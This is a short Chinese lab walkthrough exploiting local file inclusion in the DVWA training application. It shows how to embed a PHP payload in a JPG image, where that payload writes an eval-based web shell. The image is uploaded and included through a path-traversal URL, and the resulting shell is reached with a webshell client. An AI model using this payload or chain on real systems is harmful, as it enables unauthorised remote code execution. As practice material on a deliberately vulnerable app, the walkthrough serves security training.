35、本地文件包含漏洞

简介: 35、本地文件包含漏洞

一、本地文件包含漏洞:


环境:DVWA,low级别


1、制作一句话图片木马

0a2653c851af460fa595bd959398a8f1.png

第一种方法:


windows命令


copy 1.jpg/b+1.php 2.jpg


第二种方法:


将照片拖入edjpgcom软件,添加下面这句话


<?fputs(fopen("1.php","w"),'<?php eval($_POST[cmd]);?>')?>

0a2653c851af460fa595bd959398a8f1.png

2、上传图片木马文件

0eacb84100b54626af849e6b562bf92a.png

3、选择文件包含页面

2d65d23f6d4748949b924e4057485923.png

4、执行文件包含并生成后门

192.168.152.188/dvwa/vulnerabilities/fi/?page=…/…/hackable/uploads/1.jpg

2e9b90b2ca334476abebe75bafe6eeaa.png


5、在/var/www/dvwa/vulnerabilities/fi目录生成了1.php

4cebaac233b3433da32a72337a77fc60.png

6、菜刀链接

6de278e6d6694ce5bb08e7e842b7e74b.png

7a399525ddec4b77923c464820b33738 (1).png


二、环境:DVWA,medium级别


同low级别


禁止非法,后果自负


目录
相关文章
支付系统30-------支付宝支付---支付成功异步通知----通知参数和通知结果
支付系统30-------支付宝支付---支付成功异步通知----通知参数和通知结果
|
11月前
|
机器学习/深度学习 人工智能 算法
深度学习和强化学习有什么区别呢
【10月更文挑战第23天】深度学习和强化学习有什么区别呢
|
SQL 安全 Oracle
SQL Server 链接服务器(Linked Servers)
【9月更文挑战第12天】SQL Server 的链接服务器功能强大,可让你在一个实例中访问其他数据源,包括其他 SQL Server 实例、Oracle 数据库等。它支持数据集成、分布式查询和数据同步,无需复制数据。创建链接服务器需在 SQL Server Management Studio 中进行,并配置名称、类型及安全性。使用时需注意权限、性能和安全性问题,确保系统稳定和数据安全。
617 0
|
网络协议 网络性能优化 UED
|
存储 前端开发 程序员
|
存储 Unix 程序员
计算机组成原理(5)----指令系统(2)
计算机组成原理(5)----指令系统
2374 2
|
存储 移动开发 C#
一篇文章讲明白MIME详解
一篇文章讲明白MIME详解
331 0
|
算法 Serverless 数据安全/隐私保护
密钥的使用和安全性
【5月更文挑战第13天】密钥的使用和安全性
256 1
|
3天前
|
存储 弹性计算 人工智能
【2025云栖精华内容】 打造持续领先,全球覆盖的澎湃算力底座——通用计算产品发布与行业实践专场回顾
2025年9月24日,阿里云弹性计算团队多位产品、技术专家及服务器团队技术专家共同在【2025云栖大会】现场带来了《通用计算产品发布与行业实践》的专场论坛,本论坛聚焦弹性计算多款通用算力产品发布。同时,ECS云服务器安全能力、资源售卖模式、计算AI助手等用户体验关键环节也宣布升级,让用云更简单、更智能。海尔三翼鸟云服务负责人刘建锋先生作为特邀嘉宾,莅临现场分享了关于阿里云ECS g9i推动AIoT平台的场景落地实践。
【2025云栖精华内容】 打造持续领先,全球覆盖的澎湃算力底座——通用计算产品发布与行业实践专场回顾
|
2天前
|
云安全 人工智能 自然语言处理
阿里云x硅基流动:AI安全护栏助力构建可信模型生态
阿里云AI安全护栏:大模型的“智能过滤系统”。
下一篇
oss教程